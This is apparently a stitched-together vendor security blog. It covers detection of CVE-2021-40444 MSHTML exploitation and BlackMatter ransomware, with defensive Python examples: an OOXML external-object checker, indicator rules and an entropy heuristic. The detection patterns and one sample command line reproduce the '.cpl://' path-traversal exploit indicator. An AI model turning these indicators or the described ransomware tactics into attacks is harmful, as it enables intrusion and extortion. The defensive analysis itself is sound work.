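As an added illustration of the delivery step just described (this is example code written for this page, not ReaQta-Hive’s engine or Microsoft’s analysis), the Python below triages a document for the property that matters here: a .docx is a zip of OOXML parts, each part’s .rels file lists its relationships, and an oleObject relationship with TargetMode="External" means the object is fetched from outside the document rather than embedded in it. The sample package is constructed in memory and the external target is a placeholder URL.

```python
"""Triage check for external OLE object relationships in an OOXML document.

Added example, not ReaQta-Hive code. A .docx is a zip of XML parts; each
part's *.rels file lists its relationships. An oleObject relationship with
TargetMode="External" means the object is loaded from outside the package,
which is what the post describes. The sample package below is constructed
and the external target is a placeholder URL.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
STYLES_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                   "relationships/styles")


def find_external_ole_relationships(docx_bytes: bytes) -> List[Dict[str, str]]:
    """Return every external oleObject relationship found in any .rels part."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if (rel.get("Type") == OLE_REL_TYPE
                        and rel.get("TargetMode") == "External"):
                    findings.append({"part": name,
                                     "id": rel.get("Id", ""),
                                     "target": rel.get("Target", "")})
    return findings


def build_sample_docx(external_target: Optional[str]) -> bytes:
    """Construct a minimal .docx-like package (constructed test input).

    An external oleObject relationship is added only when a target is given.
    """
    rels = ['<Relationship Id="rId1" Type="%s" Target="styles.xml"/>' % STYLES_REL_TYPE]
    if external_target:
        rels.append('<Relationship Id="rId2" Type="%s" Target="%s" TargetMode="External"/>'
                    % (OLE_REL_TYPE, external_target))
    rels_xml = ('<?xml version="1.0" encoding="UTF-8"?>'
                '<Relationships xmlns="%s">%s</Relationships>' % (RELS_NS, "".join(rels)))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    clean = build_sample_docx(None)
    suspect = build_sample_docx("http://example.invalid/placeholder")  # placeholder target
    print("clean:", find_external_ole_relationships(clean))
    print("suspect:", find_external_ole_relationships(suspect))
```

An external oleObject relationship is not proof of malice on its own, so treat a hit as a reason to detonate or quarantine the file rather than as a verdict; the check is cheap enough to run at the mail gateway on every Office attachment.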


The exploit itself is not technically challenging to deploy, and since it first became known to the broader public, several proofs of concept have been released, including examples that make customization relatively easy. As MSHTML is exposed in all Microsoft Windows environments, the exploit will remain effective on any unpatched system. The availability and far reach of the exploit will therefore likely make it a common tool among attackers conducting widespread malicious email campaigns.

Analyzing the exploits

ReaQta analyzed both the exploits found in the wild and the publicly available proofs of concept, and immediately found glaring red flags in the telemetry, including techniques catalogued in the MITRE ATT&CK Framework such as T1129, Shared Modules.

ReaQta mapped the use of exploits to the MITRE ATT&CK Framework

In loading the module, the attack leverages Microsoft’s URL protocol handler but for control panel files, “.cpl://”, followed by a relative path traversal. Aside from the loading of the module, the use of .cpl:// in the URL is conspicuous and in particular its use in loading an INF file.

Of course, besides the very unusual activity around loading the malicious module, overall behaviour of Microsoft Office triggers numerous actions resembling known techniques mapped to the MITRE ATT&CK framework as well as spawning child processes.

The attack chain generates numerous events mapped to known techniques.

Even without a patch covering CVE-2021-40444, similar exploits, even against zero-day vulnerabilities, cannot be executed without generating highly anomalous activity on target machines, which an effective EDR can detect. Attackers must first work to evade standard security features of the OS, such as the additional warnings and restrictions that Protected Mode imposes on users, and living-off-the-land attacks require atypical use of the legitimate tools and protocols available on the target machine. Additionally, the attack cycle does not end with successful exploitation of CVE-2021-40444: the attackers must still conduct follow-on activity to gain wider access to the target’s network.


In-depth monitoring and threat detailing with ReaQta-Hive

ReaQta-Hive is designed to detect such activity immediately, but agents can detail the threat more specifically through ReaQta’s DeStra engine. DeStra adds a further layer of monitoring that lets blue teams craft simple yet sophisticated correlations based on the insights of the HIVE agents. While exploits against CVE-2021-40444 already trigger alerts in HIVE, a DeStra rule can mark the specific attack in an alert, in this case by matching the user agent observed in the HTTP request for the second-stage payload (“Microsoft Office Discovery Protocol”) or the use of .cpl:// with a relative path traversal in the command line of an event.
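To show what the two indicators above look like as rules, here is an added example written for this page; it is plain Python, not ReaQta’s DeStra engine or its rule syntax. It evaluates each telemetry event against the user-agent rule and the .cpl:// path-traversal rule, then correlates hits per host so that both firing on the same endpoint is rated higher than either alone. The events, hostnames, URLs and file names are constructed placeholders.

```python
"""Rule-style matching and per-host correlation for the two indicators the post names.

Added example, not ReaQta's DeStra engine or its rule language. Events,
hosts, URLs and file names below are constructed placeholders.
"""
import re
from collections import defaultdict
from typing import Dict, List

UA_RULE = "office-discovery-user-agent"
CPL_RULE = "cpl-handler-path-traversal"

# User agent observed on the request for the second-stage payload (from the post)
OFFICE_DISCOVERY_UA = "Microsoft Office Discovery Protocol"
# ".cpl:" URL handler (with or without "//") followed somewhere by "../" or "..\"
CPL_TRAVERSAL_RE = re.compile(r"\.cpl:(?://)?[^\s\"']*?\.\.[\\/]", re.IGNORECASE)


def evaluate_event(event: Dict) -> List[str]:
    """Return the names of the rules that this single event matches."""
    hits = []
    if event.get("type") == "http_request":
        if event.get("user_agent", "").strip() == OFFICE_DISCOVERY_UA:
            hits.append(UA_RULE)
    elif event.get("type") == "process_start":
        if CPL_TRAVERSAL_RE.search(event.get("command_line", "")):
            hits.append(CPL_RULE)
    return hits


def correlate(events: List[Dict]) -> Dict[str, Dict]:
    """Group rule hits per host; both rules on one host is rated 'high'."""
    per_host = defaultdict(set)
    for ev in events:
        for rule in evaluate_event(ev):
            per_host[ev["host"]].add(rule)
    return {
        host: {"rules": sorted(rules),
               "severity": "high" if len(rules) == 2 else "medium"}
        for host, rules in per_host.items()
    }


# Constructed sample telemetry: ws-01 shows both indicators, ws-02 is benign
# (control.exe opening a real applet by name, no .cpl: handler, no traversal).
SAMPLE_EVENTS = [
    {"host": "ws-01", "type": "http_request", "process": "WINWORD.EXE",
     "user_agent": "Microsoft Office Discovery Protocol",
     "url": "http://example.invalid/stage2"},
    {"host": "ws-01", "type": "process_start", "parent": "WINWORD.EXE",
     "image": "control.exe",
     "command_line": 'control.exe ".cpl://../../../AppData/Local/Temp/placeholder.inf"'},
    {"host": "ws-02", "type": "http_request", "process": "msedge.exe",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
     "url": "https://example.invalid/"},
    {"host": "ws-02", "type": "process_start", "parent": "explorer.exe",
     "image": "control.exe", "command_line": "control.exe appwiz.cpl"},
]

if __name__ == "__main__":
    for host, result in correlate(SAMPLE_EVENTS).items():
        print(host, result)
```

The regular expression deliberately accepts both `../` and `..\` and ignores case, since the handler and the traversal can be written either way; the exact-match on the user agent is intentionally strict because a legitimate Office discovery request should carry exactly that string.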

[1] Microsoft. 2021. “Microsoft MSHTML Remote Code Execution Vulnerability.” Microsoft Security Response Center.

[2] Microsoft. 2021. “Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability.” Microsoft Threat Intelligence Center.

To learn more about what makes ReaQta unique, please visit Why ReaQta and apply for a demonstration.

BlackMatter Ransomware: A New Ransomware-as-a-Service (RaaS)

Following the recent trend in ransomware affiliates, BlackMatter has emerged as the latest ransomware-as-a-service (RaaS). According to threat intelligence company Recorded Future, BlackMatter announced in an interview that it has “incorporated in itself the best features of DarkSide, REvil, and LockBit”. BlackMatter cited the following inspirations from each of these partner programs:

  • From REvil: The implementation of SafeMode was thought of as weak and not well thought through. BlackMatter then built upon this idea before thoroughly implementing it. They also implemented the PowerShell version of the ransomware variant.
  • From LockBit: BlackMatter drew on LockBit’s approach for the implementation of a codebase as well as other minute details.
  • From DarkSide: The idea of impersonation (namely, the encryptor’s ability to use the domain administrator’s account to encrypt shared drives with maximum rights) and the structure of the admin panel were borrowed.

With reference to the hacker blog, BlackMatter targets organisations with a revenue of $100 million or more and between 500 and 15,000 hosts in the network. The threat actor has also disclosed that it will not target industries such as healthcare and state institutions. BlackMatter actively advertises the purchase of network access into organizations, offering a price range of $3,000-$100,000 plus a percentage of the potential ransom amount. This modus operandi is gaining notoriety and aligns with other threat actor groups such as LockBit 2.0.


Analyzing BlackMatter

BlackMatter Blog

BlackMatter breaches organizations via purchased network access. Once initial access is secured, the threat actor moves laterally to high-value targets and exfiltrates sensitive data, thereafter deploying the ransomware centrally, for instance from the Domain Controller onto every single endpoint. Upon execution, BlackMatter encrypts files on the victim’s machine in a matter of seconds, disables file recovery and system restore, and leaves a ransom note on the victim’s machine.

BlackMatter ransom note

Aside from leaving a ransom note, BlackMatter changes the machine’s background image, which directs the victim to the README.txt file for instructions.

BlackMatter background image change

Running the attack

Within seconds of an infection, ReaQta-Hive reconstructs the breach, providing pertinent information related to the behaviours and techniques exhibited.

ReaQta-Hive’s Behavioural Tree showing the BlackMatter ransomware

Leveraging ReaQta’s ransomware protection capabilities, ransomware is autonomously stopped once ransomware behaviour is detected, preventing potential data encryption on the endpoint.

BlackMatter is automatically stopped by ReaQta-Hive within seconds

In the case of BlackMatter, ReaQta was effective within seconds, effectively mitigating potential business disruptions and downtime. In addition to stopping the threat, ReaQta’s AI automatically terminated all malicious processes involved in the incident, thereafter closing off the alert and reducing extra actions needed to be taken by the security team.
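The AvosLocker, Conti and BlackMatter write-ups above all rely on the same idea: ransomware is stopped on behaviour, not on a signature. As an added example for this page (a toy heuristic, not ReaQta-Hive’s engine), the Python below scores a process on three signals those write-ups describe: overwrites with high-entropy content, a burst of file-extension changes, and ransom notes dropped in many directories (BlackMatter’s README.txt, from the section above, is the note name used). The file events, paths and byte contents are constructed; the thresholds are assumptions chosen for the sample.

```python
"""Toy behavioural heuristic for ransomware-like file activity.

Added example, not ReaQta-Hive's engine. It aggregates three signals per
process: high-entropy writes (ciphertext looks random), renames that change
the file extension, and a ransom note created in several directories. All
events below are constructed sample telemetry; thresholds are assumptions.
"""
import math
import ntpath
import random
from collections import defaultdict
from typing import Dict, List

HIGH_ENTROPY_BITS = 7.0     # bits per byte; encrypted/compressed data sits near 8
BURST_THRESHOLD = 5         # high-entropy writes and extension changes before we block
NOTE_DIR_THRESHOLD = 3      # ransom note in this many directories is a strong signal
RANSOM_NOTE_NAMES = {"readme.txt"}   # BlackMatter's note name (from the post)


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty input, at most 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def assess_processes(events: List[Dict]) -> Dict[int, Dict]:
    """Aggregate per-pid signals and return a verdict ('block' or 'allow') for each."""
    stats = defaultdict(lambda: {"high_entropy_writes": 0, "ext_changes": 0, "note_dirs": set()})
    for ev in events:
        s = stats[ev["pid"]]
        if ev["op"] == "write" and shannon_entropy(ev["data"]) >= HIGH_ENTROPY_BITS:
            s["high_entropy_writes"] += 1
        elif ev["op"] == "rename":
            # ntpath handles the Windows-style paths regardless of the host OS
            old_ext = ntpath.splitext(ev["path"])[1].lower()
            new_ext = ntpath.splitext(ev["new_path"])[1].lower()
            if old_ext != new_ext:
                s["ext_changes"] += 1
        elif ev["op"] == "create" and ntpath.basename(ev["path"]).lower() in RANSOM_NOTE_NAMES:
            s["note_dirs"].add(ntpath.dirname(ev["path"]).lower())
    verdicts = {}
    for pid, s in stats.items():
        encrypting = (s["high_entropy_writes"] >= BURST_THRESHOLD
                      and s["ext_changes"] >= BURST_THRESHOLD)
        noting = len(s["note_dirs"]) >= NOTE_DIR_THRESHOLD
        verdicts[pid] = {
            "verdict": "block" if (encrypting or noting) else "allow",
            "high_entropy_writes": s["high_entropy_writes"],
            "ext_changes": s["ext_changes"],
            "note_dirs": len(s["note_dirs"]),
        }
    return verdicts


def build_sample_events() -> List[Dict]:
    """Constructed telemetry: pid 100 behaves like an editor, pid 200 like an encryptor."""
    rng = random.Random(7)   # seeded so the 'ciphertext' is reproducible
    text = b"Quarterly figures, see attached spreadsheet for details.\n" * 40
    events = [
        {"pid": 100, "op": "write", "path": r"C:\Users\alice\Documents\notes.txt", "data": text},
        {"pid": 100, "op": "rename", "path": r"C:\Users\alice\Documents\notes.txt.tmp",
         "new_path": r"C:\Users\alice\Documents\notes.txt"},
    ]
    for i in range(6):
        path = r"C:\Users\alice\Documents\report%d.docx" % i
        blob = bytes(rng.getrandbits(8) for _ in range(4096))   # stands in for ciphertext
        events.append({"pid": 200, "op": "write", "path": path, "data": blob})
        events.append({"pid": 200, "op": "rename", "path": path, "new_path": path + ".locked"})
    for folder in (r"C:\Users\alice\Documents", r"C:\Users\alice\Desktop", r"C:\Users\alice\Pictures"):
        events.append({"pid": 200, "op": "create", "path": folder + r"\README.txt"})
    return events


if __name__ == "__main__":
    for pid, v in assess_processes(build_sample_events()).items():
        print(pid, v)
```

Any one signal on its own is noisy (archivers write high-entropy data, installers rename files), which is why the verdict requires the encryption signals together or the note in several directories; a production engine would also weigh the process ancestry and act within the first few writes rather than after a full batch, which is the point the “within seconds” captions above are making.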

As ransomware attacks become increasingly rampant, organizations should not treat such attacks as an afterthought but instead have mitigation plans devised and ready.


Ways to defend against a ransomware attack

According to Gartner analyst Paul Webber, “organizations need to focus on preparation and early mitigation if they want to cut losses to ransomware.” The mitigation strategy Gartner describes covers the following six points:

  1. Perform initial ransomware assessments. Engage risk assessments and penetration tests to determine your organization’s attack surface and present state of security readiness in terms of tools, processes and skills to mitigate attacks.
  2. Ensure ransomware governance. Processes and execution contingency plans need to be in place to ensure swift response in the event of an actual crisis. It is also imperative for key stakeholders to be involved in this preparation.
  3. Maintain operational readiness at all times. Routinely stress-test the security systems in place to ensure ransomware activity can be detected and prevented. Incorporate incident response scenarios into these ransomware response plans so that the systems and processes in place do not rely on security systems that may be unavailable in a crisis.
  4. Maintain backups for internal systems. Back up both data and all applications within the infrastructure. Ensure that backups are done frequently and cannot be compromised in a ransomware attack.
  5. Employ a Zero Trust security model. Restrict permissions and deny unauthorized access to devices. Remove local administrator rights from end users and block application installation for standard users. Instead, replace this with a centrally managed software distribution facility.
  6. Instill employee ransomware education. All employees should understand the ransomware threat and should be educated on the steps to take during a ransomware attack. 

To learn more about what makes ReaQta unique, please visit Why ReaQta and apply for a demonstration.
